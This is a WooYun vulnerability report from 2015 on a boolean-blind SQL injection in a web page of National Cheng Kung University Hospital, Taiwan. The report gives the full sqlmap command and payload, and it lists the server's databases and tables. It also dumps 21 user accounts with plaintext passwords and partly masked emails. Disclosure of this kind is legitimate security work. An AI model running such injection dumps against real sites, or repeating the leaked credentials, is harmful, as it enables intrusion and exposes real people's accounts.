当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146734

漏洞标题:台湾国立成功大学医院某处存在SQL注射漏洞(布尔盲注/用户邮箱及明文密码泄露)(臺灣地區)

相关厂商:台湾国立成功大学

漏洞作者: 路人甲

提交时间:2015-10-14 17:13

修复时间:2015-11-30 00:24

公开时间:2015-11-30 00:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-14: 细节已通知厂商并且等待厂商处理中
2015-10-16: 厂商已经确认,细节仅向厂商公开
2015-10-26: 细节向核心白帽子及相关领域专家公开
2015-11-05: 细节向普通白帽子公开
2015-11-15: 细节向实习白帽子公开
2015-11-30: 细节向公众公开

简要描述:

台湾国立成功大学医院某处存在SQL注射漏洞(布尔盲注/用户邮箱及明文密码泄露)

详细说明:

使用sqlmap进行测试,测试地址:http://**.**.**.**/nckm/english/HomeStyle.aspx?Type=11&ContentPage=0

python sqlmap.py -u "http://**.**.**.**/nckm/english/HomeStyle.aspx?Type=11&ContentPage=0" -p Type --technique=B --random-agent -D nckmWeb -T www.UserAccount -C Userid,UserEmail,Userpwd,IsAdmin --dump --threads=10

漏洞证明:

---
Parameter: Type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Type=11 AND 4724=4724&ContentPage=0
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008


back-end DBMS: Microsoft SQL Server 2008
database management system users [2]:
[*] lsn
[*] sa


back-end DBMS: Microsoft SQL Server 2008
available databases [14]:
[*] Exam100
[*] Exam81
[*] Exam91
[*] HSYS
[*] LISDB_inquiry
[*] master
[*] model
[*] msdb
[*] mv4
[*] nckmWeb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] WorkTemp


Database: nckmWeb
[21 tables]
+-----------------------+
| www.Dept |
| www.FileDownLoads |
| www.FileDownLoads_old |
| www.FileType |
| www.GroupAccess |
| www.News |
| www.NewsPgAccess |
| www.News_bk |
| www.News_old |
| www.News_tmp |
| www.PageProfile |
| www.SiteCounter |
| www.Speech |
| www.SystemProfile |
| www.Ugroup |
| www.UserAccess |
| www.UserAccount |
| www.UserGroup |
| www.WebLinks |
| www.WebLinks_old |
| www.WebLinks_tmp |
+-----------------------+


Database: nckmWeb
Table: www.UserAccount
[14 columns]
+-------------+
| Column |
+-------------+
| DeptID |
| IsAdmin |
| IsEabled |
| KeyID |
| SysDate |
| SysUserid |
| UserEmail |
| Userid |
| UsernNaC |
| UsernNaE |
| UsernNikeNa |
| UserNote |
| Userpwd |
| Userpwdhint |
+-------------+


Database: nckmWeb
Table: www.UserAccount
[21 entries]
+--------+---------------------------+---------+
| Userid | UserEmail | Userpwd |
+--------+---------------------------+---------+
| 0000 | em75380@**.**.**.** | 5874 |
| 11C0 | <blank> | 11C0 |
| 1200 | em75576 | 1200 |
| 1400 | <blank> | 1400 |
| 1500 | <blank> | 1500 |
| 1600 | <blank> | 1600 |
| 1700 | <blank> | 1700 |
| 2000 | <blank> | sur5203 |
| 3100 | <blank> | 3100 |
| 3200 | em75441@**.**.**.** | 0925 |
| 3300 | <blank> | 5311 |
| 3400 | em75237@**.**.**.** | 3400 |
| 3500 | em75417@**.**.**.** | lee1016 |
| 3600 | em75190@**.**.**.** | 3600 |
| 3700 | <blank> | 3700 |
| 4100 | <blank> | 4100 |
| 4200 | <blank> | 4200 |
| 4300 | <blank> | 4300 |
| 4400 | <blank> | 2085 |
| 5000 | <blank> | 5000 |
| 6000 | <blank> | 821129 |
+--------+---------------------------+---------+

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-16 00:23

厂商回复:

感謝通報

最新状态:

暂无